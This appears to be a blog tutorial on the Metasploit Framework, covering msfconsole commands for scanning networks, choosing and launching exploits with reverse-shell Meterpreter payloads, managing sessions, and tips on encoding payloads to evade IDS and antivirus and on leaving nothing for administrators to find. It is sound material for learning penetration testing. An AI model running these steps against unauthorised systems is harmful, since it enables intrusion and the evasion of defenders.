December 19, 2015

Metasploit Framework

The Metasploit Framework is not something that runs out and exploits all available targets automatically.  This is not a script kiddie tool for aiming and pulling a trigger.  This a serious toolbox full of modules, exploits, and payload templates.  You need to know how to put it all together to get anything meaningful out of it.

  1. Find targets.
  2. Find vulnerabilities.
  3. Exploit the vulnerabilities.
  4. Drop a payload.
  5. Hopefully run some shell code with the payload.
  6. Own the box.
  7. repeat.

Metasploit Framework Terms

Before getting started with the Metasploit Framework (MSF), I need to explain a few things from Metasploit’s perspective:

  • An Exploit allows an attacker to take advantage of a flaw (also called a bug) within the target system’s operating system, a software application, a running service, etc. that results in a favorable outcome for the attacker.  In another words, it allows you to bypass whatever security protects the system under normal operation.
  • A Payload is the code that we want the compromised system to execute.  A handy payload is a reverse shell.
  • Shellcode is a set of instructions, typically wrote in assembly language, which are packaged up in a payload.  Commonly what happens is a command shell, reverse shell, or Meterpreter shell is returned.
  • A Module is code that can be used by the Metasploit Framework.  A modules exploits, auxiliary (utilities like scanners), and post.  You can interchange modules to make it powerful.
  • A Listener is a service that listens on the attackers machine that waits for a compromised target to call it back.  Typically you need this to bypass firewalls.  If the target calls from a private IP address behind the organization’s firewall, out to the public Internet, the target’s firewall will typically allow it.

Interfaces to the Metasploit Framework

You can interface with the Metasploit Framework (MSF) in different ways:

  • The Console (msfconsole) – This is a standalone application that provides user friendly access to the all of the options, settings as well as being able to perform everything like launching exploits, loading modules, enumerate targets, create listeners, or run mass exploration with a fire and wait nuclear option.
  • Command line (msfcli) – Runs directly from the Linux or Windows command line.  Use this to script the framework into other tools.
  • Armitage GUI (armitage) – Full featured graphical user interface.  For details check out our Armitage page.

metasploit20

Using msfconsole

  • Before you use the msfconsole, you may need to start the database:
    • root@kali:~# service postgresql start
  • Start up the MSF Console:
    • root@kali:~# msfconsole
    • You should see one of the many Metasploit banners, the version and number exploits, auxiliary, post, payloads, encoders, and nops.
    • Then prompt will change to ‘msf >’
  • Check to see if the PostgreSQL database is connected to MSF:
    • msf > db_status
  • To run nmap and have the results go to the database use db_nmap:
    • msf > db_nmap -sS -Pn -A 192.168.1.0/24
  • Check the results in the database with:
    • msf > hosts
    • msf > services
  • Show all exploits in the framework.
    • msf > show exploits
  • Show all payloads in the framework.
    • msf > show payloads
  • Show all the auxiliary modules in the framework.
    • msf > show auxiliary
  • Search for exploits or modules in the framework.
    • msf > search ____ <– whatever…
    • msf > search cisco
    • msf > search linksys
    • msf > search windows
    • msf > search lenovo
    • msf > search ms15
  • To see what the exploit or module does use the info command followed by the exploit path and name.  It’s best to search then copy and paste.
    • msf > info ____ <–name of an exploit, module, etc…
    • msf > info exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader
    • msf > info exploit/windows/local/ms14_009_ie_dfsvc
    • msf > info scanner/portscan/syn
  • When you decide on which module or exploit to fire at the target, use it.
    • msf > use scanner/portscan/syn
    • msf auxiliary(syn) > show options
    • msf auxiliary(syn) > set rhosts 192.168.0.0/12
    • msf auxiliary(syn) > set ports 21-1434,3389
    • msf auxiliary(syn) > run
  • Most modules and exploits will require you to at least provide the RHOST (remote host, aka the target), you do this with the set command.  Rather than setting it every time you go into a new module or exploit, you can set it globally with setg.
    • msf exploit(msadc) > set rhost 192.168.0.0/24
    • msf > setg rhost 192.168.0.0/24
  • You can check to see whether the target is vulnerable before actually launching an active attack.
    • msf exploit(msadc) > check
  • To see the options set for a module or exploit, use show options and show advanced.
    • msf auxiliary(syn) > show options
    • msf auxiliary(syn) > show advanced
  • Some of the exploits are aimed at very specific operating systems and patch levels, by default it is set to automatic (Id = 0), but automatic doesn’t work well will every exploit.  Some of the exploits work better if you tell it specifically which version and patch level (via the id number).  Also you will want to set a payload for the exploit to enable you to take actions against the target once it has been successfully exploited.
    • msf exploit(ms08_067_netapi) > show targets
    • msf exploit(ms08_067_netapi) > set target 3
    • msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
  • Now when it comes to exploiting the target, you can use exploit and/or run, they seem to do the same thing.
    • msf exploit(msadc) > exploit
    • msf exploit(msadc) > run
  • exploit has a few options:
    • msf exploit(msadc) > exploit -h <– shows help for the exploit command.
    • msf exploit(msadc) > exploit -j <– runs the exploit as a job in the background.
    • msf exploit(msadc) > exploit -z <– don’t interact with the session after successful exploitation.
    • msf exploit(msadc) > exploit -e some_encoder_name <– specify the payload encoder to evade IDS.
  • After you gain a command line interface on one or many targets, you interact with them using the sessions command.
  • To list sessions available to interact with.
    • msf > sessions -l
  • To list all sessions available as well as showing the verbose fields, such as with exploits worked to start the session.
    • msf > sessions -l -v
  • To execute a command on all live Meterpreter sessions.
    • msf > sessions -c _____ <– the name of some command.
  • To run a Meterpreter script on all Meterpreter live sessions.
    • msf > sessions -s _____ <– the name of the script.
  • To upgrade a normal Win32 shell to a Meterpreter comsole.
    • msf > sessions -u _____ <– the sessionID.
  • It’s always best when you are finished to kill all live sessions and leave nothing open for the system and network administrators to find.
    • msf > sessions -k

Metasploit Utils

  • msfpayload – Generates shellcode in multiple languages including C, JavaScript, Ruby, and VB for Apps.
  • msfencode – Use this after msfpayload which helps the code in the payload avoid bad characters, avoid IDS and virus signature detection.
  • nasm_shell.rb – Use this to read the assembly code.

metasploit10

Updating Metasploit on Kali Linux

If you are having an issue with msfupdate always saying there’s no updates, then edit the /etc/apt/sources.list file and check the repositories it needs to function.  Make sure the top (uncommented) line exist in the file.  The others are old now.

  • deb http://http.kali.org/kali kali-rolling main contrib non-free
  • # deb http://http.kali.org/kali sana main non-free contrib
  • # deb http://security.kali.org/kali-security sana/updates main contrib non-free
  • # deb http://old.kali.org/kali moto main non-free contrib

If it still isn’t working check kali.org for the latest repo changes.

Workspaces

If you will be using MSF for multiple clients or environments (a.k.a. Consultants) then you will need to separate them by Workspace.  When you start msfconsole for the first time, you will be in the default workspace.

  • msf > workspace to list all the workspace.
  • msf > workspace -v to list the workspaces with counts of hosts, services, vulns, creds, loots, and notes.
  • msf > workspace -a MyNewWorkspace – to ADD a new workspace.
  • msf > workspace -r oldWorkspaceName newWS – to RENAME a workspace.
  • msf > workspace -d MyOldAssWorkspace – to DELETE a workspace.
  • msf > workspace -D delete ALL workspaces (a.k.a. nuke from high orbit).
  • msf > workspace -h to get help.

Querying the MSF Postgres Database

Once you collect the data, you will want to dig down and find the interesting things.

Query the Services

  • To show which services are open
    • msf > services -u
  • To show all available columns (note that the address will always be shown on the left side)
    • msf > services -c created_at,info,name,port,proto,state,updated_at
  • To show certain columns AND for a single hosts or subnet
    • msf > services -c proto,port,state,name 192.168.4.77
    • msf > services -c proto,port,state,name 192.168.4.0/24
  • To drill down to find specific ports, such as web servers
    • msf > services -p 80,443
  • To sort the results by the column number (e.g. the port is the 2nd column)
    • msf > services -O 2 
  • To export the results to a CSV file.
    • msf > services -p 80,433 -O 2 -o /root/somedir/somefile.csv

Query for Exploits

  • To show exploits matching the year of the CVE
    • search cve:2017
  • To show exploits matching text in the name
    • search name:struts
  • To show exploits for a particular platform
    • search platform:apple

Query for Auxiliary things

  • To show the scanners
    • search type:auxiliary name:scanner

Source Code

Go to Github for the source code –> https://github.com/rapid7/metasploit-framework